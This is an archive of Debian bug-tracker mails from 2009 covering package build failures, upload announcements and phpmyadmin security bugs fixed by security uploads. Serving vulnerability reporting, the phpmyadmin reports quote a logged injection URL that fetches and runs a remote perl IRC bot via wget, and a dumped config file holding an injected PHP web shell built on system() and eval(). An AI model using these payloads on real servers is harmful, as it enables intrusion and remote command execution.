SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 19:01:38 +0100 Source: classpath Binary: classpath classpath-gtkpeer classpath-qtpeer classpath-common classpath-common-unzipped classpath-doc Architecture: source all amd64 Version: 2:0.98-5 Distribution: unstable Urgency: low Maintainer: Debian Java Maintainers pkg-java-maintain...@lists.alioth.debian.org Changed-By: Michael Koch konque...@gmx.de Description: classpath - clean room standard Java libraries classpath-common - clean room standard Java libraries - architecture independent fil classpath-common-unzipped - clean room standard Java libraries - architecture independent fil classpath-doc - clean room standard Java libraries - free Java API documentation classpath-gtkpeer - clean room standard Java libraries - GTK+ AWT peer classpath-qtpeer - clean room standard Java libraries - QT AWT peer Closes: 548477 551253 Changes: classpath (2:0.98-5) unstable; urgency=low . * Build against xulrunner-dev (= 1.9.1) (Closes: #551253). * Build with default-jdk aka openjdk on alpha (Closes:
Bug#552332: marked as done (sugar-calculate-activity: empty package (except for /usr/share/doc))
Your message dated Sun, 25 Oct 2009 18:47:47 + with message-id e1n2883-00028i...@ries.debian.org and subject line Bug#552332: fixed in sugar-calculate-activity 30-3 has caused the Debian Bug report #552332, regarding sugar-calculate-activity: empty package (except for /usr/share/doc) to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 552332: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=552332 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: sugar-calculate-activity Version: 30-2 Severity: grave Justification: renders package unusable sugar-calculate-activity doesn't contain anything except documentation: sascha.si...@emac:~$ dpkg -L sugar-calculate-activity /. /usr /usr/share /usr/share/doc /usr/share/doc/sugar-calculate-activity /usr/share/doc/sugar-calculate-activity/buildinfo.gz /usr/share/doc/sugar-calculate-activity/changelog.Debian.gz /usr/share/doc/sugar-calculate-activity/NEWS.gz /usr/share/doc/sugar-calculate-activity/AUTHORS /usr/share/doc/sugar-calculate-activity/copyright sascha.si...@emac:~$ -- System Information: Debian Release: 5.0.3 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-2-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash CU Sascha -- http://sascha.silbe.org/ http://www.infra-silbe.de/ signature.asc Description: Digital signature ---End Message--- ---BeginMessage--- Source: sugar-calculate-activity Source-Version: 30-3 We believe that the bug you reported is fixed in the latest version of sugar-calculate-activity, which is due to be installed in the Debian FTP archive: sugar-calculate-activity_30-3.diff.gz to pool/main/s/sugar-calculate-activity/sugar-calculate-activity_30-3.diff.gz sugar-calculate-activity_30-3.dsc to pool/main/s/sugar-calculate-activity/sugar-calculate-activity_30-3.dsc sugar-calculate-activity_30-3_all.deb to pool/main/s/sugar-calculate-activity/sugar-calculate-activity_30-3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 552...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Jonas Smedegaard d...@jones.dk (supplier of updated sugar-calculate-activity package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Format: 1.8 Date: Sun, 25 Oct 2009 19:24:50 +0100 Source: sugar-calculate-activity Binary: sugar-calculate-activity Architecture: source all Version: 30-3 Distribution: unstable Urgency: low Maintainer: Debian OLPC debian-olpc-de...@lists.alioth.debian.org Changed-By: Jonas Smedegaard d...@jones.dk Description: sugar-calculate-activity - calculate activity for the Sugar graphical shell Closes: 552332 Changes: sugar-calculate-activity (30-3) unstable; urgency=low . * Update python-sugar.mk to replace superfluous COPYING files with symlinks. * Drop COPYING removal (python-sugar.mk replaces with symlink now). * Fix python-sugar.mk to include both simple and versioned activity packages in DEB_PYTHON_SUGAR_PACKAGES by default. This fixes sugar-calculate-activity virtually empty binary package, and closes: bug#552332, thanks to Sascha Silbe. Checksums-Sha1: ed2c1de737ddabdf4fa91fed7b2615113fcf0f8d 1637 sugar-calculate-activity_30-3.dsc 9b3a7fb719341a50a9554c7ab6c6aec092e544ef 17142 sugar-calculate-activity_30-3.diff.gz df13c26c58fe23ee4eaec23600bf13f5267dd89d 120580 sugar-calculate-activity_30-3_all.deb Checksums-Sha256: 853ea0134fd98d87ee0025e5e629439fc9f94d5ae1b5303186e58f437bcc3ff9 1637 sugar-calculate-activity_30-3.dsc c5a75338fd30ca291cf9e6447cbbff1dc45b27f42e289bce6373a3d001b0a1ab 17142 sugar-calculate-activity_30-3.diff.gz f80dc960ab34a2e63a04604a098d118371b6a4b57ac5c4f258024fe8df85e48b 120580 sugar-calculate-activity_30-3_all.deb Files: cdcf846b0e04ff94c41d7662a3089ef0 1637 x11 optional sugar-calculate-activity_30-3.dsc a879389f745c3687d3dc98f453bd1628 17142 x11 optional sugar-calculate-activity_30-3.diff.gz 59b6a0c893e360be1aac4ff83dc2ba65 120580 x11 optional sugar-calculate-activity_30-3_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux)
Bug#551253: marked as done (classpath: FTBFS: gcjwebplugin.cc:65:31: error: nsIPluginInstance.h: No such file or directory)
Your message dated Sun, 25 Oct 2009 18:47:43 + with message-id e1n287z-00027x...@ries.debian.org and subject line Bug#551253: fixed in classpath 2:0.98-5 has caused the Debian Bug report #551253, regarding classpath: FTBFS: gcjwebplugin.cc:65:31: error: nsIPluginInstance.h: No such file or directory to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 551253: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=551253 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Source: classpath Version: 2:0.98-4 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20091016 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: x86_64-linux-gnu-g++ -DHAVE_CONFIG_H -I. -I../../include -I/usr/include/xulrunner-1.9/unstable -Wall -DAPPLETVIEWER_EXECUTABLE=\/usr/lib/classpath/gappletviewer\ -DXP_UNIX -DOJI -I/usr/include/xulrunner-1.9.1/stable -I/usr/include/nspr -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -D_REENTRANT -pthread -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/cairo -I/usr/include/pango-1.0 -I/usr/include/pixman-1 -I/usr/include/freetype2 -I/usr/include/directfb -I/usr/include/libpng12 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -g -O2 -c gcjwebplugin.cc -fPIC -DPIC -o .libs/libgcjwebplugin_la-gcjwebplugin.o gcjwebplugin.cc:65:31: error: nsIPluginInstance.h: No such file or directory gcjwebplugin.cc:66:35: error: nsIPluginInstancePeer.h: No such file or directory gcjwebplugin.cc:67:31: error: nsIPluginTagInfo2.h: No such file or directory gcjwebplugin.cc:149: error: ISO C++ forbids declaration of 'NS_DEFINE_IID' with no type gcjwebplugin.cc:149: error: 'kIPluginTagInfo2IID' was not declared in this scope gcjwebplugin.cc:149: error: 'NS_IPLUGINTAGINFO2_IID' was not declared in this scope gcjwebplugin.cc:149: error: initializer expression list treated as compound expression gcjwebplugin.cc:207: error: ISO C++ forbids declaration of 'nsIPluginTagInfo2' with no type gcjwebplugin.cc:207: error: expected ';' before '*' token gcjwebplugin.cc: In function 'gchar* plugin_get_documentbase(NPP_t*)': gcjwebplugin.cc:876: error: 'nsIPluginInstance' was not declared in this scope gcjwebplugin.cc:876: error: 'xpcom_instance' was not declared in this scope gcjwebplugin.cc:877: error: 'nsIPluginInstancePeer' was not declared in this scope gcjwebplugin.cc:877: error: 'peer' was not declared in this scope gcjwebplugin.cc:878: error: 'nsresult' was not declared in this scope gcjwebplugin.cc:878: error: expected `;' before 'result' gcjwebplugin.cc:879: error: 'nsIPluginTagInfo2' was not declared in this scope gcjwebplugin.cc:879: error: 'pluginTagInfo2' was not declared in this scope gcjwebplugin.cc:884: error: expected primary-expression before ')' token gcjwebplugin.cc:898: error: 'union info_union' has no member named 'info_field' gcjwebplugin.cc:900: error: 'result' was not declared in this scope gcjwebplugin.cc:900: error: 'kIPluginTagInfo2IID' was not declared in this scope gcjwebplugin.cc:920: error: 'NS_RELEASE' was not declared in this scope gcjwebplugin.cc: At global scope: gcjwebplugin.cc:149: warning: 'NS_DEFINE_IID' defined but not used make[3]: *** [libgcjwebplugin_la-gcjwebplugin.lo] Error 1 The full build log is available from: http://people.debian.org/~lucas/logs/2009/10/16/classpath_2:0.98-4_lsid64.buildlog A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems. -- | Lucas Nussbaum | lu...@lucas-nussbaum.net http://www.lucas-nussbaum.net/ | | jabber: lu...@nussbaum.fr GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: classpath Source-Version: 2:0.98-5 We believe that the bug you reported is fixed in the latest version of classpath, which is due to be installed in the Debian FTP archive: classpath-common-unzipped_0.98-5_all.deb to pool/main/c/classpath/classpath-common-unzipped_0.98-5_all.deb classpath-common_0.98-5_all.deb to pool/main/c/classpath/classpath-common_0.98-5_all.deb classpath-doc_0.98-5_all.deb to pool/main/c/classpath/classpath-doc_0.98-5_all.deb classpath-gtkpeer_0.98-5_amd64.deb to pool/main/c/classpath/classpath-gtkpeer_0.98-5_amd64.deb
Bug#529908: Upstream Fix
On Sunday 25 October 2009 14:18:07 Andreas Metzler wrote: I think this is caused by mixing old ltmain.sh in ./admin with new libtool.m4 in /usr/share/ or something like that. Interesting, I tried libtoolize to no avail - it just broke the build even further. I checked the admin folder in the kde-common module in the KDE 3.5 SVN repo and it as old as mine. Any ideas on what to do/try out to remedy this? (Other than hand-edit the admin folder!) The aclocal run triggered by make -f Makefile.cvs throws loads of errors and warnings: I think these are a red herring. I get them too and I can still build fine. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#549737: libgnucrypto-java: FTBFS: rm: cannot remove `debian/libgnucrypto-java/usr/share/info/dir': No such file or directory
On 25/10/09 at 19:39 +0100, Michael Koch wrote: On Mon, Oct 05, 2009 at 08:54:45PM +0200, Lucas Nussbaum wrote: Source: libgnucrypto-java Version: 2.1.0-3 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20091005 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: make[3]: Entering directory `/build/user-libgnucrypto-java_2.1.0-3-amd64-KtKw9k/libgnucrypto-java-2.1.0' make[3]: Nothing to be done for `install-exec-am'. make[3]: Nothing to be done for `install-data-am'. make[3]: Leaving directory `/build/user-libgnucrypto-java_2.1.0-3-amd64-KtKw9k/libgnucrypto-java-2.1.0' make[2]: Leaving directory `/build/user-libgnucrypto-java_2.1.0-3-amd64-KtKw9k/libgnucrypto-java-2.1.0' make[1]: Leaving directory `/build/user-libgnucrypto-java_2.1.0-3-amd64-KtKw9k/libgnucrypto-java-2.1.0' dh_installdirs -plibgnucrypto-java dh_installdocs -plibgnucrypto-java ./README ./AUTHORS ./THANKS dh_installexamples -plibgnucrypto-java dh_installman -plibgnucrypto-java dh_installinfo -plibgnucrypto-java dh_installmenu -plibgnucrypto-java dh_installcron -plibgnucrypto-java dh_installinit -plibgnucrypto-java dh_installdebconf -plibgnucrypto-java dh_installemacsen -plibgnucrypto-java dh_installcatalogs -plibgnucrypto-java dh_installpam -plibgnucrypto-java dh_installlogrotate -plibgnucrypto-java dh_installlogcheck -plibgnucrypto-java dh_installchangelogs -plibgnucrypto-java ./ChangeLog dh_installudev -plibgnucrypto-java dh_lintian -plibgnucrypto-java dh_install -plibgnucrypto-java dh_link -plibgnucrypto-java dh_installmime -plibgnucrypto-java touch debian/libgnucrypto-java/etc/java/security/security.d/3000-gnu.crypto.jce.GnuCrypto rm: cannot remove `debian/libgnucrypto-java/usr/share/info/dir': No such file or directory make: *** [binary-install/libgnucrypto-java] Error 1 I just tried locally in pbuilder and the rm above did not failed and the package build successfully. Is this FTBFS still reproducible for you? Or was the bug somewhere else and got fixed already? It failed again on 16/10/2009, but I haven't tested since then. Have you tried diff'ing your build log with mine? -- | Lucas Nussbaum | lu...@lucas-nussbaum.net http://www.lucas-nussbaum.net/ | | jabber: lu...@nussbaum.fr GPG: 1024D/023B3F4F | -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: reassign 552312 to libpixman-1-0, severity of 552312 is important
Processing commands for cont...@bugs.debian.org: reassign 552312 libpixman-1-0 0.16.2-1 Bug #552312 [xserver-xorg-core] xserver-xorg-core: pixman assertion failure in X Bug reassigned from package 'xserver-xorg-core' to 'libpixman-1-0'. Bug No longer marked as found in versions xorg-server/2:1.7.0-1. Bug #552312 [libpixman-1-0] xserver-xorg-core: pixman assertion failure in X Bug Marked as found in versions pixman/0.16.2-1. severity 552312 important Bug #552312 [libpixman-1-0] xserver-xorg-core: pixman assertion failure in X Severity set to 'important' from 'grave' End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552194: marked as done (Phpmyadmin Bug)
Your message dated Sun, 25 Oct 2009 19:57:50 + with message-id e1n29dq-0001vy...@ries.debian.org and subject line Bug#552194: fixed in phpmyadmin 4:2.9.1.1-13 has caused the Debian Bug report #552194, regarding Phpmyadmin Bug to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 552194: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=552194 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via a crafted MySQL table name. SQL injection vulnerability allows remote attackers to inject SQL via various interface parameters of the PDF schema generator feature. Assigned CVE ids: CVE-2009-3696 CVE-2009-3697 For more clarity: http://www.phpmyadmin.net/home_page/security/PMASA-2009-6.php -- System Information: Debian Release: 5.0.3 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-2-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages phpmyadmin depends on: ii debconf [debconf-2 1.5.24Debian configuration management sy ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii perl 5.10.0-19lenny2 Larry Wall's Practical Extraction ii php5-mcrypt5.2.6.dfsg.1-1+lenny3 MCrypt module for php5 ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5 Versions of packages phpmyadmin recommends: ii apache2-mpm-prefor 2.2.9-10+lenny4 Apache HTTP Server - traditional n ii php5-gd5.2.6.dfsg.1-1+lenny3 GD module for php5 Versions of packages phpmyadmin suggests: ii mysql-server 5.0.51a-24+lenny2 MySQL database server (metapackage ii mysql-server-5.0 [mysq 5.0.51a-24+lenny2 MySQL database server binaries -- debconf information excluded ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.9.1.1-13 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.9.1.1-13.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.diff.gz phpmyadmin_2.9.1.1-13.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.dsc phpmyadmin_2.9.1.1-13_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 552...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Sun, 25 Oct 2009 12:25:47 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.9.1.1-13 Distribution: oldstable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - Administrate MySQL over the WWW Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.9.1.1-13) oldstable-security; urgency=low . * Fix inverted logic in documentation of new script. . phpmyadmin (4:2.9.1.1-12) oldstable-security; urgency=high . * Upload to oldstable to fix security issues. * Cross site scripting (CVE-2009-3696, closes: #552194). * Allow saving of configuration from setup script only after explicit action from administrator (closes: #535044, #543460). Files: 0a8c412c5481b2260562ab5649c70d8b 1021 web extra phpmyadmin_2.9.1.1-13.dsc 68fc6b7269343482b96326553dd1e0c0 57060 web extra phpmyadmin_2.9.1.1-13.diff.gz 85eaa36525db64fdd0ba9955c9def399 3605314 web extra phpmyadmin_2.9.1.1-13_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJK5DbCAAoJECIIoQCMVaAcnqQIAJYA79w/IdQftDzenAXzRv41 YGmyo3SA0X3e76VeLdUstXJa+JvT5uKZNRVx3sh9s+HfIdETKKhNb1pkdla/RmZ1 X55bYpF8HIavS2tJcRaCn9E5txJs5epgz0bd2Mg1uhp3Y07EnbCAR19VG7nqIj87 HPT3CU/i5Y/0GO+JrWPt6Mh59TySEXzCHnDuSpPZUBMWxS5RgyQ7qjIu6HaStixv
Bug#535044: marked as done (phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection)
Your message dated Sun, 25 Oct 2009 19:57:41 + with message-id e1n29dh-0001sy...@ries.debian.org and subject line Bug#535044: fixed in phpmyadmin 4:2.11.8.1-5+lenny3 has caused the Debian Bug report #535044, regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Hi, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null; It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages phpmyadmin depends on: ii debconf [debconf-2 1.5.24Debian configuration management sy ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii perl 5.10.0-19 Larry Wall's Practical Extraction ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-mcrypt5.2.6.dfsg.1-1+lenny3 MCrypt module for php5 ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5 Versions of packages phpmyadmin recommends: ii apache22.2.9-10+lenny3 Apache HTTP Server metapackage ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n ii php5-gd5.2.6.dfsg.1-1+lenny3 GD module for php5 Versions of packages phpmyadmin suggests: ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries -- debconf information: phpmyadmin/setup-username: admin * phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.11.8.1-5+lenny3 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.11.8.1-5+lenny3.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz phpmyadmin_2.11.8.1-5+lenny3.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc phpmyadmin_2.11.8.1-5+lenny3_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 535...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 12:30:40 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.11.8.1-5+lenny3 Distribution: stable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - MySQL web administration tool Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low . * Correct some documentation issues of new script. . phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high . * Upload to stable to fix security issues. * Fixes XSS and SQL injection (Closes: #552194). [PMASA-2009-6, CVE-2009-3696, CVE-2009-3697] * Allow saving of configuration from setup script only after explicit action from administrator (Closes: #535044, #543460). Checksums-Sha1: 104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc e73e24d04b0c73386de7ae4e112227d17eae7d98 63773 phpmyadmin_2.11.8.1-5+lenny3.diff.gz
Bug#543460: marked as done (phpmyadmin: No password protection for setup.php script)
Your message dated Sun, 25 Oct 2009 19:57:41 + with message-id e1n29dh-0001sy...@ries.debian.org and subject line Bug#535044: fixed in phpmyadmin 4:2.11.8.1-5+lenny3 has caused the Debian Bug report #535044, regarding phpmyadmin: No password protection for setup.php script to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: grave Tags: security Justification: user security hole After install, you can access http://{host}/phpmyadmin/scripts/setup.php without entering any password. By adding a new host in the configuration, an attacker can submit malicius code to execute commands as www-data user. This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack: /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo 'pre';system($_GET['c']);echo '/pre';}if($_GET['p']){echo 'pre';eval($_GET['p']);echo '/pre';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ -- System Information: Debian Release: 4.0 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-6-686 Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti ii perl 5.8.8-7etch6Larry Wall's Practical Extraction ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5 ii ucf 2.0020 Update Configuration File: preserv Versions of packages phpmyadmin recommends: ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD pn php5-gd | php4-gd none (no description available) pn php5-mcrypt | php4-mcrypt none (no description available) -- debconf information: phpmyadmin/setup-username: admin phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false ---End Message--- ---BeginMessage--- Source: phpmyadmin Source-Version: 4:2.11.8.1-5+lenny3 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.11.8.1-5+lenny3.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz phpmyadmin_2.11.8.1-5+lenny3.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc phpmyadmin_2.11.8.1-5+lenny3_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 535...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 12:30:40 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.11.8.1-5+lenny3 Distribution: stable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - MySQL web administration tool Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low . * Correct some documentation issues of new script. . phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high . * Upload to stable to fix security issues. * Fixes XSS and SQL injection (Closes: #552194). [PMASA-2009-6, CVE-2009-3696, CVE-2009-3697] * Allow saving of configuration from setup script only after explicit action from administrator (Closes: #535044, #543460). Checksums-Sha1: 104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc e73e24d04b0c73386de7ae4e112227d17eae7d98 63773
Bug#551949: marked as done (phpmyadmin: Denial of Service Attack through setup.php)
Your message dated Sun, 25 Oct 2009 19:57:41 + with message-id e1n29dh-0001sy...@ries.debian.org and subject line Bug#535044: fixed in phpmyadmin 4:2.11.8.1-5+lenny3 has caused the Debian Bug report #535044, regarding phpmyadmin: Denial of Service Attack through setup.php to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: important Reporting a remote denial of service attack against phpmyadmin's setup.php interface. After the attack the web interface is not usable. The web client displays the following text. Welcome to phpMyAdmin 2.9.1.1-Debian-11 phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in config.inc.php and make sure that they correspond to the information given by the administrator of the MySQL server. Error MySQL said: #1045 - Access denied for user 'root'@'localhost' (using password: NO) After the attack the following file exists: -rw-r- 1 root root 746 2009-10-04 15:23:40 /var/lib/phpmyadmin/config.inc.php Here are the contents of that file: ?php /* * Generated configuration file * Generated by: phpMyAdmin 2.9.1.1-Debian-11 setup script by Michal Čihař mic...@cihar.com * Version: $Id: setup.php 9484 2006-10-03 13:11:22Z nijel $ * Date: Sun, 04 Oct 2009 15:23:40 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host___if___GET__cecho___pre___system___GET__cechopreif___GET__pecho___pre___eval___GET__pechopre___'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; 